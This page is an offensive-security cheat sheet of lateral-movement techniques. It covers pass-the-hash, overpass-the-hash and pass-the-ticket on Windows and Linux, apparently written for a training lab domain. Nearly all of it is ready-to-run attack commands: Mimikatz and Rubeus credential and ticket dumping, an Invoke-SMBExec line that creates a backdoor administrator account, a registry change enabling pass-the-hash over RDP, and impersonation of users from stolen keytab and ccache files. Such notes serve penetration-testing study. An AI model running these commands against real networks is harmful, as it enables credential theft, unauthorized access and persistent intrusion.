Windows Lateral Movement

Pass The Hash (Mimikatz)

mimikatz.exe privilege::debug "sekurlsa::pth /user:<user> /rc4:<hash> /domain:inlanefreight.htb /run:cmd.exe" exit

Pass The Hash (Invoke-TheHash)

# Import Module
Import-Module .\Invoke-TheHash.psd1

# Pass The Hash
Invoke-SMBExec -Target <IP> -Domain <domain> -Username <username> -Hash <hash> -Command "net user 0xF0rk Password123 /add && net localgroup administrators 0xF0rk /add" -Verbose

# With WMI
Invoke-WMIExec -Target DC01 -Domain <domain> -Username <user> -Hash <hash> -Command "powershell -e <base64 command>"

Pass the Hash Impacket (Linux)

impacket-psexec administrator@<IP> -hashes :<hash>

Pass The Hash CrackMapExec (LInux)

crackmapexec smb <IP> -u Administrator -d . -H <hash> --local-auth

Pass The Hash RDP

# Enable RDP
reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f

# RDP
xfreerdp  /v:<IP> /u:<user> /pth:<hash>

Harvesting Tickets From Windows

# Mimikatz
## Check Privs
privilege::debug

# Show Tickets
sekurlsa::tickets /export


# Rubeus
Rubeus.exe dump /nowrap

Pass the Key or OverPass the Hash

# Mimikatz Extract Keys
privilege::debug
sekurlsa::ekeys

# Mimikatz OverPass the Hash
sekurlsa::pth /domain:inlanefreight.htb /user:<user> /ntlm:<rc4_value>

# Rubeus
Rubeus.exe  asktgt /domain:inlanefreight.htb /user:plaintext /aes256:<aes256_hmac_Value>

Pass the Ticket (PtT)

# Rubeus
## /ptt -> current session
 Rubeus.exe asktgt /domain:inlanefreight.htb /user:plaintext /rc4:<rc4_value>

# Import .Kirbi 
Rubeus.exe ptt /ticket:file.kirbi

# Base64 Encode .Kirbi
Convert]::ToBase64String([IO.File]::ReadAllBytes("file.kirbi"))

# Import With Base64
Rubeus.exe ptt /ticket:<base64>

Pass The Ticket PowerShell Remoting

# Import Ticket
kerberos::ptt "file.kirbi"

# Enter PC
Enter-PSSession -ComputerName <computername>

Pass The Ticket (From Linux)

Check Linux Machine Domain Joined

realm list

ps -ef | grep -i "winbind\|sssd"

Find Keytab Files

find / -name *keytab* -ls 2>/dev/null

Find ccache Files

A credential cache or ccache file holds Kerberos credentials while they remain valid and, generally, while the user's session lasts.

env | grep -i krb5

Abusing KeyTab Files

# Klist List Keytab files
klist -k -l

# Impersonate Other User
kinit carlos@INLANEFREIGHT.HTB -k -t /opt/specialfiles/carlos.keytab

# Verify 
klist

Keytab Extract

python3 /opt/blackbuntu/keytabextract.py file.keytab

Abusing Keytab ccache

To abuse a ccache file, all we need is read privileges on the file. These files, located in /tmp, can only be read by the user who created them, but if we gain root access, we could use them.

# Import ccache file
export KRB5CCNAME=<fileL
klist

# Able to read DC
smbclient //dc01/C$ -k -c ls -no-pass

Convert ccache file for Windows

https://github.com/fortra/impacket/blob/master/examples/ticketConverter.py

PreviousWindows Local Password Attacks NextPowerView

Last updated 1 year ago

hashtagPass The Hash (Mimikatz)

hashtagPass The Hash (Invoke-TheHash)

hashtagPass the Hash Impacket (Linux)

hashtagPass The Hash CrackMapExec (LInux)

hashtagPass The Hash RDP

hashtagHarvesting Tickets From Windows

hashtagPass the Key or OverPass the Hash

hashtagPass the Ticket (PtT)

hashtagPass The Ticket PowerShell Remoting

hashtagPass The Ticket (From Linux)

hashtagCheck Linux Machine Domain Joined

hashtagFind Keytab Files

hashtagFind ccache Files

hashtagAbusing KeyTab Files

hashtagKeytab Extract

hashtagAbusing Keytab ccache

hashtagConvert ccache file for Windows

hashtag